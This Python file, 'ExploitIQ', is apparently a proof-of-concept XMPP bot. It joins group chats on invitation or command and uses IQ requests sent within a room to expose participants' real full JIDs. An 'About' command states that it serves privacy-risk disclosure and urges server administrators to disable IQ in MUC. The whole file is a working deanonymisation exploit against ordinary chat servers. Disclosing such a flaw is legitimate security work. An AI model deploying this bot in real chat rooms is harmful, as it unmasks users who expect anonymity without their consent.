#!/usr/bin/env python3 # Name: ExploitIQ # License: No license, Unlicensed, Public Domain. from getpass import getpass from argparse import ArgumentParser import logging import slixmpp class ExploitIQ(slixmpp.ClientXMPP): """ ExploitIQ - Expose Full JID by MUC IQ. """ def __init__(self, jid, password): slixmpp.ClientXMPP.__init__(self, jid, password) self.add_event_handler("disco_info", self.discovery) self.add_event_handler("groupchat_direct_invite", self.on_groupchat_direct_invite) self.add_event_handler("groupchat_invite", self.on_groupchat_invite) self.add_event_handler("message", self.process_message) self.add_event_handler("session_start", self.start) async def start(self, event): self.command_list() self.send_presence() await self['xep_0115'].update_caps() async def discovery(self, DiscoInfo): jid = DiscoInfo['from'] await self['xep_0115'].update_caps(jid=jid) def on_groupchat_invite(self, message): jid = message['groupchat_invite']['jid'] self.plugin['xep_0045'].join_muc(jid, 'ExploitIQ') def on_groupchat_direct_invite(self, message): jid = message['groupchat_invite']['jid'] self.plugin['xep_0045'].join_muc(jid, 'ExploitIQ') def process_message(self, message): if message['type'] in ('chat', 'normal'): message_text = " ".join(message['body'].split()) message_lowercase = message_text.lower() match message_lowercase: case _ if message_lowercase.startswith('join '): jid = message_lowercase[5:] self.plugin['xep_0045'].join_muc(jid, 'ExploitIQ') case _: message_body = ('Send: `join ` (JID has to be of groupchat.') message.reply(message_body).send() def command_list(self): self['xep_0050'].add_command(node='start', name='Start', handler=self._handle_start) self['xep_0050'].add_command(node='about', name='About', handler=self._handle_about) def _handle_start(self, iq, session): jid = session['from'].bare text_note = 'Is this you JID?\n{}'.format(jid) session['notes'] = [['info', text_note]] return session def _handle_about(self, iq, session): text_note = ('This software is a proof of concept to realize a ' 'privacy risk that results from sending IQ in MUC, ' 'which would allow exposure of participant JID.' '\n\n' 'XMPP server administrators are encouraged to disable ' 'IQ in MUC and implement XEP-0000 which is more secure.') session['notes'] = [['info', text_note]] return session if __name__ == '__main__': # Setup the command line arguments. parser = ArgumentParser(description=ExploitIQ.__doc__) # Output verbosity options. parser.add_argument("-q", "--quiet", help="set logging to ERROR", action="store_const", dest="loglevel", const=logging.ERROR, default=logging.INFO) parser.add_argument("-d", "--debug", help="set logging to DEBUG", action="store_const", dest="loglevel", const=logging.DEBUG, default=logging.INFO) # JID and password options. parser.add_argument("-j", "--jid", dest="jid", help="JID to use") parser.add_argument("-p", "--password", dest="password", help="password to use") args = parser.parse_args() # Setup logging. logging.basicConfig(level=args.loglevel, format='%(levelname)-8s %(message)s') if args.jid is None: args.jid = input("Username: ") if args.password is None: args.password = getpass("Password: ") # Setup the bot and register plugins. Note that while plugins may # have interdependencies, the order in which you register them does # not matter. xmpp = ExploitIQ(args.jid, args.password) xmpp.register_plugin('xep_0030') # Service Discovery xmpp.register_plugin('xep_0004') # Data Forms xmpp.register_plugin('xep_0060') # Publish-Subscribe xmpp.register_plugin('xep_0045') # Multi-User Chat xmpp.register_plugin('xep_0050') # Ad-Hoc Commands xmpp.register_plugin('xep_0115') # Entity Capabilities xmpp.register_plugin('xep_0122') # Data Forms Validation xmpp.register_plugin('xep_0199') # XMPP Ping # Connect to the XMPP server and start processing XMPP stanzas. xmpp.connect() xmpp.process()